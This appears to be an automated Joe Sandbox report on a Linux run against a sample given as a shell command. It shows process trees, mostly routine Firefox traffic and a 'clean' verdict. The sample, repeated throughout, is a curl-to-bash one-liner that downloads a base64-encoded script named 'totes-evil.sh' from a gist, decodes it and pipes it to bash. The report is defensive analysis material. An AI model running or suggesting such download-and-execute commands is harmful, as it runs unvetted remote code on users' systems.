Create Interactive Tour

Linux Analysis Report
http://bash -c “curl https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d | bash”

Overview

General Information

Sample URL:http://bash -c “curl https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d%2
Analysis ID:725664
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false

Signatures

Uses the "uname" system call to query kernel version information (possible evasion)
Queries the installed Ubuntu/CentOS release
Creates hidden files and/or directories

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:725664
Start date and time:2022-10-18 22:42:52 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:http://bash -c “curl https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d | bash”
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:CLEAN
Classification:clean1.lin@0/41@29/0
  • Excluded domains from analysis (whitelisted): incoming.telemetry.mozilla.org, aus5.mozilla.org
  • system is lnxubuntu20
  • exo-open (PID: 6231, Parent: 6216, MD5: 60a307a6a6325e2034eb5cc56bff1abd) Arguments: exo-open http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
    • exo-open New Fork (PID: 6232, Parent: 6231)
      • exo-open New Fork (PID: 6233, Parent: 6232)
      • exo-helper-2 (PID: 6233, Parent: 1860, MD5: ab59c8990baa7254463cdf800a83b9e3) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 --launch WebBrowser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
        • sensible-browser (PID: 6234, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/sensible-browser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
          • which (PID: 6235, Parent: 6234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: which sensible-browser
        • x-www-browser (PID: 6234, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/x-www-browser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
          • which (PID: 6236, Parent: 6234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: which /usr/bin/x-www-browser
        • firefox (PID: 6234, Parent: 6233, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
          • firefox New Fork (PID: 6238, Parent: 6234)
          • firefox New Fork (PID: 6239, Parent: 6234)
          • firefox New Fork (PID: 6258, Parent: 6234)
          • lsb_release (PID: 6258, Parent: 6234, MD5: 69f442c3e33b5f9a66b722c29ad89435) Arguments: /usr/bin/lsb_release -idrc
          • firefox New Fork (PID: 6281, Parent: 6234)
          • dbus-launch (PID: 6281, Parent: 6234, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
          • firefox New Fork (PID: 6287, Parent: 6234)
            • firefox New Fork (PID: 6289, Parent: 6287)
          • firefox (PID: 6287, Parent: 6234, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -parentBuildID 20210816143654 -prefsLen 1 -prefMapSize 238647 -appdir /usr/lib/firefox/browser 6234 true socket
          • firefox New Fork (PID: 6322, Parent: 6234)
            • firefox New Fork (PID: 6326, Parent: 6322)
          • firefox (PID: 6322, Parent: 6234, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 102 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
          • firefox New Fork (PID: 6369, Parent: 6234)
            • firefox New Fork (PID: 6371, Parent: 6369)
          • firefox (PID: 6369, Parent: 6234, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 5165 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
          • firefox New Fork (PID: 6413, Parent: 6234)
            • firefox New Fork (PID: 6415, Parent: 6413)
          • firefox (PID: 6413, Parent: 6234, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 6013 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
  • cleanup
No yara matches
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.23:57044 version: TLS 1.2
Source: global trafficHTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteIf-Modified-Since: Sat, 31 Jul 2021 15:17:12 GMTIf-None-Match: "8cfd2c8fe1fb0bc900759661d7a6ee89"
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: WCCDx3PI+svspMX/uFSUUQ==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global trafficHTTP traffic detected: GET /update/3/GMP/91.0.1/20210816143654/Linux_x86_64-gcc3/null/release-cck-ubuntu/Linux%205.4.0-72-generic%20(GTK%203.24.20%2Clibpulse%2013.99.0)/canonical/1.0/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: ZFg30joj6cMDZG/xR0R8eA==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global trafficHTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteIf-Modified-Since: Tue, 01 Jun 2021 14:28:23 GMTIf-None-Match: "1622557703112"
Source: global trafficHTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global trafficHTTP traffic detected: GET /main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftl HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global trafficHTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteIf-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMTIf-None-Match: "1648230346554"
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: AT/lsOEeG9ZCQRI3v244Rw==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: e2m9/qpkGSc6I/RXdydcUQ==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: unknownDNS traffic detected: queries for: content-signature-2.cdn.mozilla.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43384
Source: unknownNetwork traffic detected: HTTP traffic on port 38910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54412
Source: unknownNetwork traffic detected: HTTP traffic on port 60092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54410
Source: unknownNetwork traffic detected: HTTP traffic on port 57044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54400
Source: unknownNetwork traffic detected: HTTP traffic on port 38686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60092
Source: unknownNetwork traffic detected: HTTP traffic on port 43384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38910
Source: unknownNetwork traffic detected: HTTP traffic on port 38916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38912
Source: unknownNetwork traffic detected: HTTP traffic on port 54412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38916
Source: unknownNetwork traffic detected: HTTP traffic on port 54410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 38912 -> 443
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: scriptCache-new.bin.42.drString found in binary or memory: http://json-schema.org/draft-04/schema#
Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes
Source: asrouter.ftl.tmp.42.dr, DED23BB33EA3C88FAD1C0A1CD53916E0D8C424D3.42.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: cert9.db-journal.42.drString found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://ocsp.digicert.com0K
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: scriptCache-new.bin.42.drString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: scriptCache-new.bin.42.drString found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: http://x1.i.lencr.org/0
Source: scriptCache-new.bin.42.drString found in binary or memory: https://amazon.com
Source: scriptCache-new.bin.42.drString found in binary or memory: https://baidu.com
Source: scriptCache-new.bin.42.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: scriptCache-new.bin.42.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=921157
Source: 5FFD69415953BE9CE9C07B2E9C26DA959ADEA6CB.42.drString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: scriptCache-child-new.bin.42.drString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: scriptCache-new.bin.42.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes
Source: 3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drString found in binary or memory: https://doh.xfinity.com/dns-query
Source: scriptCache-new.bin.42.drString found in binary or memory: https://duckduckgo.com
Source: scriptCache-new.bin.42.drString found in binary or memory: https://ebay.com
Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/
Source: DED23BB33EA3C88FAD1C0A1CD53916E0D8C424D3.42.drString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/4f1bcaa0-ddf9-
Source: 3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drString found in binary or memory: https://firefox.dns.next
Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.dns.nextdns.io/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: 254256B27E0C48CF9B80B695F0B3B8CA84610495.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://github.com/Kinto/kinto-attachment/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://google.com
Source: scriptCache-new.bin.42.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: 340B70193347BCBC4B59921548690031A7BC2414.42.drString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/deletion-request/1/b15353ee-6d41-4b99-
Source: 3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: https://pki.goog/repository/0
Source: 3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drString found in binary or memory: https://private.canadianshield.cira.ca/dns-query
Source: scriptCache-new.bin.42.drString found in binary or memory: https://profiler.firefox.com
Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://remote-settings.readthedocs.io
Source: scriptCache-new.bin.42.drString found in binary or memory: https://settings.stage.mozaws.net/v1/buckets/main-preview/collections/search-config/records
Source: scriptCache-new.bin.42.drString found in binary or memory: https://settings.stage.mozaws.net/v1/buckets/main/collections/search-config/records
Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/flash-protected-mode-autodisabled
Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: scriptCache-new.bin.42.drString found in binary or memory: https://trr.dns.nextdns.io/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://twitter.com
Source: cert9.db.42.dr, cert9.db-journal.42.drString found in binary or memory: https://www.digicert.com/CPS0
Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.google.com/policies/privacy/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.mozilla.org/firefox/new/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.openh264.org/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.widevine.com/
Source: scriptCache-new.bin.42.drString found in binary or memory: https://yandex.com
Source: unknownHTTP traffic detected: POST /submit/firefox-desktop/deletion-request/1/b15353ee-6d41-4b99-a1da-728cade21808 HTTP/1.1Host: incoming.telemetry.mozilla.orgUser-Agent: Glean/39.0.0 (Rust on Linux)Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brx-client-version: 39.0.0content-type: application/json; charset=utf-8date: Tue, 18 Oct 2022 22:44:26 GMTcontent-encoding: gzipcontent-length: 283x-client-type: GleanConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: no-corsSec-Fetch-Site: nonePragma: no-cacheCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.23:57044 version: TLS 1.2
Source: classification engineClassification label: clean1.lin@0/41@29/0
Source: /usr/bin/exo-open (PID: 6231)Directory: /home/saturnino/.cacheJump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6233)Directory: /home/saturnino/.cacheJump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6233)Directory: /home/saturnino/.localJump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6233)Directory: /home/saturnino/.configJump to behavior
Source: /usr/lib/firefox/firefox (PID: 6234)Directory: /home/saturnino/.cacheJump to behavior
Source: /usr/bin/exo-open (PID: 6231)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6233)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6234)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6239)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/dbus-launch (PID: 6281)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6322)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6369)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6413)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 6258)Arguments: /usr/bin/lsb_release -> /usr/bin/lsb_release -idrcJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Hidden Files and Directories
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 725664 URL: http://bash%20-c%20%E2%80%9... Startdate: 18/10/2022 Architecture: LINUX Score: 1 34 firefox.settings.services.mozilla.com 18.64.119.32, 38910, 38912, 38916 MIT-GATEWAYSUS United States 2->34 36 109.202.202.202, 80 INIT7CH Switzerland 2->36 38 25 other IPs or domains 2->38 10 exo-open 2->10         started        process3 process4 12 exo-open 10->12         started        process5 14 exo-open exo-helper-2 12->14         started        process6 16 exo-helper-2 sensible-browser x-www-browser firefox 14->16         started        process7 18 firefox firefox 16->18         started        20 firefox firefox 16->20         started        22 firefox firefox 16->22         started        24 7 other processes 16->24 process8 26 firefox 18->26         started        28 firefox 20->28         started        30 firefox 22->30         started        32 firefox 24->32         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://bash%20-c%20curl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://trr.dns.nextdns.io/0%URL Reputationsafe
http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
https://firefox.dns.next0%URL Reputationsafe
http://x1.c.lencr.org/00%URL Reputationsafe
http://x1.c.lencr.org/00%URL Reputationsafe
http://x1.i.lencr.org/00%URL Reputationsafe
https://firefox.dns.nextdns.io/0%URL Reputationsafe
https://mozilla.cloudflare-dns.com/dns-query0%URL Reputationsafe
http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
